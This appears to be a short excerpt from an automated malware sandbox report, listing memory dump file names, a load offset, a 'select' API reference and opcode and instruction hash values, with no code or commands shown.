                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: select
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 1274211008-3887548279
                                                                                                                                                                                                              • Opcode ID: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                                                              • Instruction ID: 6522e2537fb8c8e721883018bf3c6a7a4605c561a93ab5d2b210f47b7f02e7dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 094172341083859BD3318F24C588BEBFBE4EB89314F24492FD8D9972C2D3B99865CB56